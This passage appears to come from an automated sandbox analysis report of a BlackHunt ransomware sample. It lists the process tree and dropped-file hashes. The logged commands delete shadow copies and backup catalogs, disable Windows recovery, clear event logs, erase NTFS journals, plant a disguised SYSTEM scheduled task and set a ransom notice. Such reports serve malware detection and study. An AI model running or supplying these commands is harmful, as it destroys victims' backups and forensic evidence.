                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                      2⤵
                                        PID:1352
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                          3⤵
                                            PID:920
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                          2⤵
                                            PID:5116
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                              3⤵
                                                PID:3576
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                              2⤵
                                                PID:4692
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                  3⤵
                                                    PID:4656
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                  2⤵
                                                    PID:3784
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                      3⤵
                                                        PID:1844
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                      2⤵
                                                        PID:2948
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                          3⤵
                                                            PID:4812
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:4860
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                              3⤵
                                                                PID:2212
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:4956
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                    PID:2428
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:2444
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                      3⤵
                                                                        PID:3728
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                      2⤵
                                                                        PID:3252
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                          3⤵
                                                                            PID:4628
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                          2⤵
                                                                            PID:4440
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                              3⤵
                                                                                PID:2636
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                              2⤵
                                                                                PID:4004
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                  3⤵
                                                                                    PID:4472
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                  2⤵
                                                                                    PID:4140
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                      3⤵
                                                                                        PID:4072
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe" /F
                                                                                      2⤵
                                                                                      • Modifies registry class
                                                                                      PID:4340
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe" /F
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4288
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                      2⤵
                                                                                        PID:2144
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                          3⤵
                                                                                            PID:2172
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                          2⤵
                                                                                            PID:1768
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              3⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1648
                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                              vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                              3⤵
                                                                                              • Interacts with shadow copies
                                                                                              PID:4844
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                            2⤵
                                                                                              PID:2116
                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                3⤵
                                                                                                • Enumerates connected drives
                                                                                                • Interacts with shadow copies
                                                                                                PID:1456
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                              2⤵
                                                                                                PID:3916
                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                  3⤵
                                                                                                  • Interacts with shadow copies
                                                                                                  PID:7240
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                2⤵
                                                                                                  PID:1728
                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                    3⤵
                                                                                                    • Interacts with shadow copies
                                                                                                    PID:10076
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                  2⤵
                                                                                                    PID:4312
                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                      vssadmin.exe Delete Shadows /all /quiet
                                                                                                      3⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:7332
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                    2⤵
                                                                                                      PID:2184
                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                        3⤵
                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                        PID:7576
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                      2⤵
                                                                                                        PID:4616
                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                          fsutil.exe usn deletejournal /D C:
                                                                                                          3⤵
                                                                                                          • Deletes NTFS Change Journal
                                                                                                          PID:7592
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                        2⤵
                                                                                                          PID:2288
                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                            schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                            3⤵
                                                                                                              PID:7392
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                            2⤵
                                                                                                              PID:2496
                                                                                                              • C:\Windows\system32\wbadmin.exe
                                                                                                                wbadmin.exe delete catalog -quiet
                                                                                                                3⤵
                                                                                                                • Deletes backup catalog
                                                                                                                PID:7548
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                              2⤵
                                                                                                                PID:1696
                                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                                  bcdedit /set {default} recoveryenabled No
                                                                                                                  3⤵
                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                  PID:7636
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
                                                                                                                2⤵
                                                                                                                  PID:8356
                                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                                    fsutil usn deletejournal /D M:\
                                                                                                                    3⤵
                                                                                                                    • Enumerates connected drives
                                                                                                                    PID:11480
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
                                                                                                                  2⤵
                                                                                                                    PID:6540
                                                                                                                    • C:\Windows\system32\fsutil.exe
                                                                                                                      fsutil usn deletejournal /D C:\
                                                                                                                      3⤵
                                                                                                                        PID:8312
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
                                                                                                                      2⤵
                                                                                                                        PID:6136
                                                                                                                        • C:\Windows\system32\wevtutil.exe
                                                                                                                          wevtutil.exe cl System
                                                                                                                          3⤵
                                                                                                                          • Clears Windows event logs
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:8968
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
                                                                                                                        2⤵
                                                                                                                          PID:6356
                                                                                                                          • C:\Windows\system32\wevtutil.exe
                                                                                                                            wevtutil.exe cl Security /e:false
                                                                                                                            3⤵
                                                                                                                            • Clears Windows event logs
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:9780
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                                          2⤵
                                                                                                                            PID:5776
                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                              bcdedit /set {default} recoveryenabled No
                                                                                                                              3⤵
                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                              PID:7768
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                                            2⤵
                                                                                                                              PID:10444
                                                                                                                              • C:\Windows\system32\fsutil.exe
                                                                                                                                fsutil.exe usn deletejournal /D C:
                                                                                                                                3⤵
                                                                                                                                • Deletes NTFS Change Journal
                                                                                                                                PID:13780
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                              2⤵
                                                                                                                                PID:11976
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                                  3⤵
                                                                                                                                    PID:8216
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
                                                                                                                                  2⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:7648
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                    3⤵
                                                                                                                                      PID:6896
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 1360
                                                                                                                                        4⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:2408
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:11848
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping 127.0.0.1 -n 5
                                                                                                                                        3⤵
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:944
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                                                      2⤵
                                                                                                                                        PID:8648
                                                                                                                                        • C:\Windows\system32\notepad.exe
                                                                                                                                          notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                                                          3⤵
                                                                                                                                            PID:11100
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
                                                                                                                                          2⤵
                                                                                                                                            PID:7068
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                                            2⤵
                                                                                                                                              PID:6868
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                              2⤵
                                                                                                                                                PID:12280
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                                                                2⤵
                                                                                                                                                  PID:7292
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5252
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                    2⤵
                                                                                                                                                      PID:8176
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2156
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                        2⤵
                                                                                                                                                          PID:8180
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                          2⤵
                                                                                                                                                            PID:11572
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
                                                                                                                                                            2⤵
                                                                                                                                                              PID:11476
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
                                                                                                                                                              2⤵
                                                                                                                                                                PID:8404
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:11492
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:10584
                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  PID:3280
                                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:1560
                                                                                                                                                                • C:\Windows\system32\wbengine.exe
                                                                                                                                                                  "C:\Windows\system32\wbengine.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:12972
                                                                                                                                                                • C:\Windows\System32\vdsldr.exe
                                                                                                                                                                  C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:15872
                                                                                                                                                                  • C:\Windows\System32\vds.exe
                                                                                                                                                                    C:\Windows\System32\vds.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                    PID:8724
                                                                                                                                                                  • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                    C:\Windows\System32\WaaSMedicAgent.exe e3decf77ea829a33e4bd13811690e11b dFVSYjBU5UKQYNwMQNBoqA.0.1.0.0.0
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    PID:4844
                                                                                                                                                                  • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                    wevtutil.exe cl Setup
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Clears Windows event logs
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:9212
                                                                                                                                                                  • C:\Windows\system32\wbadmin.exe
                                                                                                                                                                    wbadmin.exe delete catalog -quiet
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Deletes backup catalog
                                                                                                                                                                    PID:8016
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4056
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:8636
                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                        taskkill /IM mshta.exe /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:11092
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:9436
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:9616
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:10896
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6896 -ip 6896
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:6840
                                                                                                                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Modifies boot configuration data using bcdedit
                                                                                                                                                                                PID:8396
                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:11704
                                                                                                                                                                              • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                wevtutil.exe cl Security
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Clears Windows event logs
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:7848
                                                                                                                                                                              • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                wevtutil.exe cl Application
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Clears Windows event logs
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:11604
                                                                                                                                                                              • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                fsutil usn deletejournal /D F:\
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                PID:7712

                                                                                                                                                                              Network

                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                              Replay Monitor

                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                              Downloads

                                                                                                                                                                              • C:\ProgramData\#BlackHunt_Private.key

                                                                                                                                                                                Filesize

                                                                                                                                                                                1KB

                                                                                                                                                                                MD5

                                                                                                                                                                                34ffd9a5879b2bd8998ad8848e01be03

                                                                                                                                                                                SHA1

                                                                                                                                                                                c5d18e464742084df4c66671e3f19f0676a0eebe

                                                                                                                                                                                SHA256

                                                                                                                                                                                51724199c4bcedb39a9b087e2538993e2a0dfe4ed9da0b2c584b72ac8bccb4dd

                                                                                                                                                                                SHA512

                                                                                                                                                                                ad5ab140255a7b08fa65c8f3fe759724f0fd2822930cc3967f0f18b2a0de24dbc1c5c99b222845ae80a9a30623e615c94905b8a3cd17bb1c7a82e297f07e5fca

                                                                                                                                                                              • C:\ProgramData\#BlackHunt_ReadMe.hta

                                                                                                                                                                                Filesize

                                                                                                                                                                                12KB

                                                                                                                                                                                MD5

                                                                                                                                                                                cdececc2c6af2c130d3a096f9d99453f

                                                                                                                                                                                SHA1

                                                                                                                                                                                fb1fb939316938e3a09630f8e6332e43c728ad72

                                                                                                                                                                                SHA256

                                                                                                                                                                                1a0b889618f50ec6be6786b57388ba21afa642151a849453de8d84828cbd9777

                                                                                                                                                                                SHA512

                                                                                                                                                                                1ab7efbb629401f048daff413c6dba18fc66223a9cbd79918d1ae2969aac32c59f6a542658c7eb6941830ff18901f4f47c00423aec901065800e56d6edcdb9ea

                                                                                                                                                                              • C:\ProgramData\#BlackHunt_ReadMe.txt

                                                                                                                                                                                Filesize

                                                                                                                                                                                684B

                                                                                                                                                                                MD5

                                                                                                                                                                                73d409be037325ec6bcb9fa8cc3792d8

                                                                                                                                                                                SHA1

                                                                                                                                                                                1cc6e4dfe598eaf17f8e71b1c69c9a21990ce4aa

                                                                                                                                                                                SHA256

                                                                                                                                                                                53cd967834176ef49549756fd9a498c1e85ce99c5148a0112cf4c94810eb57aa

                                                                                                                                                                                SHA512

                                                                                                                                                                                2f9e592f4a180ade5296336d01fdba632eab58d8efefa75db7ef43251c3b9c91bc7c9885e5e804a5d84e838e2c8f2c1976f6dd9e25c52b0f005f00d4e84904f6